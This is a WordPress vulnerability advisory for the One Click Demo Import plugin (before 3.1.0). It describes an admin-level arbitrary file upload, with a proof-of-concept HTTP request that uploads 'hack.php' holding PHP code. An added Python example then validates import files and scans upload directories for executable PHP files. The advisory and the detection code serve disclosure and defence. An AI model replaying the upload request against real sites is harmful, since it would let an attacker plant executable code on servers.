WordPress Plugin Vulnerabilities

One Click Demo Import < 3.1.0 - Admin+ Arbitrary File Upload

Description

The plugin does not validate the imported file, allowing high-privilege users such as admin to upload arbitrary files (such as PHP) even when FILE_MODS and FILE_EDIT are disallowed.

Proof of Concept

Access Tools > Import > One Click Demo Import > Run Importer and import a dummy XML file (it can be empty).

Intercept the request made and change the filename as well as the content:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------18228892847416541933274753306
Content-Length: 507
Connection: close
Cookie: [admin+]

-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="action"

ocdi_upload_manual_import_files
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="security"

e35089cb91
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="content_file"; filename="hack.php"
Content-Type: text/xml

<?php phpinfo();?>
-----------------------------18228892847416541933274753306--


The file will be at https://example.com/wp-content/uploads/<year>/<month>/hack.php
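The root cause above is a missing allowlist check on the uploaded import file. The following Python is an added example (not the plugin's own code, and not a patch for it) that shows the two things a defender wants here: the validation the handler should perform before writing the file (extension allowlist applied to every suffix, plus a content sniff instead of trusting the client-supplied Content-Type), and a detection sweep that lists PHP-executable files sitting under an uploads tree, where none should ever exist. The allowlist (xml, json, dat, wie), the executable-extension list and the function names are assumptions of this example; the sample inputs are constructed and include the advisory's hack.php upload.

```python
"""Defensive checks for a demo-import upload handler (added example, not the
plugin's own code).

is_allowed_import_file(): the allowlist validation the advisory says the plugin
    lacked before 3.1.0. Only formats a demo importer consumes are accepted, and
    the check looks at every filename suffix and the leading bytes of the body,
    never at the client-supplied Content-Type.
find_executable_uploads(): a detection sweep over an uploads directory for
    files with PHP-executable extensions.
"""
import os
import re
import tempfile

# Extensions a demo importer legitimately consumes (assumed allowlist).
ALLOWED_EXTENSIONS = {"xml", "json", "dat", "wie"}

# Extensions PHP engines or common web server configs will execute (assumed
# list). Anything under wp-content/uploads with one of these is suspicious.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht", "phps"}

# Matches "<?php" and the short echo tag "<?="; "<?xml" does not match.
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def _extensions(filename: str) -> list[str]:
    """Every suffix after the first dot, lowercased, so 'shell.php.xml' yields
    ['php', 'xml'] and double-extension tricks are not missed."""
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def is_allowed_import_file(filename: str, content: bytes) -> tuple[bool, str]:
    """Return (ok, reason). Accept only if every suffix is allowlisted, the body
    carries no PHP open tag, and the body looks like the format it claims."""
    exts = _extensions(filename)
    if not exts:
        return False, "no extension"
    bad = [e for e in exts if e not in ALLOWED_EXTENSIONS]
    if bad:
        return False, "extension not allowed: " + ".".join(bad)
    if PHP_OPEN_TAG.search(content):
        return False, "PHP open tag in content"
    head = content.lstrip()[:1]  # sniff the body; the client Content-Type is untrusted
    if exts[-1] == "xml" and head != b"<":
        return False, "xml file does not start with '<'"
    if exts[-1] == "json" and head not in (b"{", b"["):
        return False, "json file does not start with '{' or '['"
    return True, "ok"


def find_executable_uploads(uploads_root: str) -> list[str]:
    """Walk an uploads tree and return paths (relative to the root) whose suffix
    chain contains an executable extension, e.g. 2022/03/hack.php."""
    hits = []
    for dirpath, _dirs, files in os.walk(uploads_root):
        for name in files:
            if any(e in EXECUTABLE_EXTENSIONS for e in _extensions(name)):
                hits.append(os.path.relpath(os.path.join(dirpath, name), uploads_root))
    return sorted(hits)


def demo() -> dict:
    """Run both checks on constructed sample data and return the results."""
    samples = {
        "hack.php": b"<?php phpinfo();?>",              # the advisory's PoC upload
        "demo-content.xml": b'<?xml version="1.0"?><rss/>',
        "shell.php.xml": b"<rss/>",                       # double-extension attempt
        "widgets.wie": b'{"sidebar-1": []}',
    }
    results = {name: is_allowed_import_file(name, body)[0] for name, body in samples.items()}
    # Constructed uploads tree: one planted PHP file next to a harmless image.
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "2022", "03"))
        for rel, body in (("2022/03/hack.php", b"<?php ?>"), ("2022/03/image.png", b"\x89PNG")):
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(body)
        results["scan"] = find_executable_uploads(root)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Rejecting hack.php at upload time is the fix; the sweep is the compensating control for sites that cannot update yet, and it pairs naturally with a web server rule that refuses to execute PHP under wp-content/uploads at all.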

Affects Plugins

References

Miscellaneous

Original Researcher
YICHENG LIU-ZTE CHENFENG lab
Submitter
YICHENG LIU-ZTE CHENFENG lab
Verified
Yes

Timeline

Publicly Published
2022-03-21
Added
2022-03-21
Last Updated
2022-04-11
